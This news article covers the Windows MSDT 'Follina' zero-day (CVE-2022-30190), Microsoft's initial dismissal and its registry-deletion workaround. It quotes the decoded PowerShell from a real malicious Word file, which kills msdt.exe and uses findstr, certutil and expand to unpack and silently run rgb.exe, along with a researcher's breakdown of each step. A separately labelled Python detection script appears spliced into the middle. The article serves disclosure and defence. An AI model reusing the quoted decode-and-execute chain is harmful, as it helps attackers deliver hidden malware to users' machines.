Zero Day Code Execution in Windows Has Been Actively Exploited For 7 Weeks


A critical zero-day code-execution vulnerability in all supported versions of Windows has been actively exploited for seven weeks, giving attackers a reliable way to install malware without triggering Windows Defender and a list of other endpoint protection products.

Researchers from the Shadow Chasers Team described the behavior on Twitter. In a reply on April 21, however, the researchers were informed that the Microsoft Security Feedback Center team did not consider the reported behavior a security vulnerability, because the MSDT diagnostic tool requires a password before executing the payload.

Uh, never mind

On Monday, Microsoft reversed course, assigning the behavior the vulnerability tracker CVE-2022-30190 and warning for the first time that the reported behavior constitutes a critical vulnerability.

“A remote code execution vulnerability exists when MSDT is invoked using the URL protocol from a calling application such as Word,” the advisory said. “An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s permissions.”

At the time this story was published, Microsoft had not yet released a patch. Instead, it recommended that customers disable the MSDT URL protocol by:

  1. Running Command Prompt as Administrator.
  2. Backing up the registry key by executing the command “reg export HKEY_CLASSES_ROOT\ms-msdt filename”
  3. Executing the command “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”

Although initially overlooked by Microsoft, the vulnerability came to light again when a researcher identified a Word document, uploaded to VirusTotal on Friday, that exploited a previously unknown attack vector.

Based on analysis by researcher Kevin Beaumont, the document uses Word to retrieve an HTML file from a remote web server. The document then uses the MSProtocol URI scheme to load and execute PowerShell commands.

“That can’t be,” Beaumont wrote.

Unfortunately, it can be.

When the commands in the document are decoded, they translate to:

$cmd = "c:\windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";

According to researcher John Hammond of security company Huntress, the script:

  • Launches hidden windows to:
    • Kill msdt.exe if it is running
    • Loop through the files inside the RAR archive, looking for the Base64 string of an encoded CAB file
      • Store this Base64-encoded CAB file as 1.t
      • Decode the Base64-encoded CAB file and save it as 1.c
      • Expand the 1.c CAB file into the current directory, and finally:
      • Execute rgb.exe (presumably compressed inside the 1.c CAB file)

Beaumont also called attention to an academic paper from August 2020 that showed how MSDT could be used for code execution. That means there was at least one other time the company’s security team failed to grasp the possibility that this behavior could be maliciously exploited.

No, Protected View won’t save you

Normally, Word is set up to load content downloaded from the Internet in Protected View, a mode that disables macros and other potentially harmful functions. For reasons that are not clear, Beaumont said, if the document is loaded as a Rich Text Format file, it will “run without even opening the document (via the preview tab in Explorer), let alone Protected View.”

In other words, the Huntress researchers wrote, an RTF file can “trigger this exploit with just the Preview Pane in Windows Explorer.” In doing so, “this expands the severity of this threat not just by ‘one click’ to exploit, but potentially by ‘no-click’ activation.”
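As an added defender-side example (not code from the article or from the researchers it quotes), the following Python checks a .docx's relationship parts for the remote-resource fetch Beaumont describes and checks an RTF file, which is plain text and therefore also covers the Preview Pane case above, for the ms-msdt: scheme; the sample files and the example.invalid URL are constructed here, not taken from the real document.

```python
import io
import re
import zipfile

# Indicators from the write-up: a Word relationship pointing at a remote
# (http/https) resource, and any reference to the ms-msdt: URL protocol handler.
REL_ELEMENT = re.compile(r"<Relationship\b[^>]*>", re.IGNORECASE)
ATTRIBUTE = re.compile(r'(\w+)="([^"]*)"')
MSDT_SCHEME = re.compile(r"ms-msdt:", re.IGNORECASE)

def scan_text(text: str) -> dict:
    """Return remote relationship targets and whether ms-msdt: appears."""
    remote = []
    for element in REL_ELEMENT.findall(text):
        attrs = dict(ATTRIBUTE.findall(element))
        target = attrs.get("Target", "")
        if attrs.get("TargetMode", "").lower() == "external" and target.lower().startswith("http"):
            remote.append(target)
    return {"remote_targets": remote, "msdt": bool(MSDT_SCHEME.search(text))}

def scan_docx(data: bytes) -> dict:
    """Walk every XML/rels part of a .docx (a zip archive) and merge findings."""
    result = {"remote_targets": [], "msdt": False}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.endswith((".xml", ".rels")):
                part = scan_text(zf.read(name).decode("utf-8", errors="ignore"))
                result["remote_targets"] += part["remote_targets"]
                result["msdt"] = result["msdt"] or part["msdt"]
    return result

def scan_rtf(data: bytes) -> dict:
    """RTF is plain text, so the same check covers the Preview Pane case."""
    return scan_text(data.decode("latin-1", errors="ignore"))

def is_suspicious(findings: dict) -> bool:
    """Either indicator alone is enough to pull the file for manual review."""
    return bool(findings["remote_targets"]) or findings["msdt"]

# Constructed samples (not real malware): a minimal .docx rels part and a tiny RTF.
SAMPLE_RELS = ('<Relationships><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/'
               'officeDocument/2006/relationships/oleObject" '
               'Target="http://example.invalid/placeholder.html" TargetMode="External"/></Relationships>')
SAMPLE_RTF = b"{\\rtf1 constructed sample ms-msdt:PLACEHOLDER }"
def build_sample_docx() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels", SAMPLE_RELS)
    return buf.getvalue()
```

A clean document has only relative, package-internal targets in its rels parts, so `is_suspicious` returns False for it while both constructed samples are flagged.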

In addition to the document uploaded to VirusTotal on Friday, researchers discovered a separate Word file, uploaded on April 12, that exploited the same zero-day.

Given the severity of this unpatched vulnerability, organizations that rely on Microsoft Office should thoroughly investigate how it affects their networks. Disabling the MSDT URL protocol is unlikely to create major disruption in the short term, and possibly in the long term. During the investigation, at least until Microsoft releases more details and instructions, Office users should turn off the protocol entirely and subject any documents downloaded over the Internet to extra scrutiny.
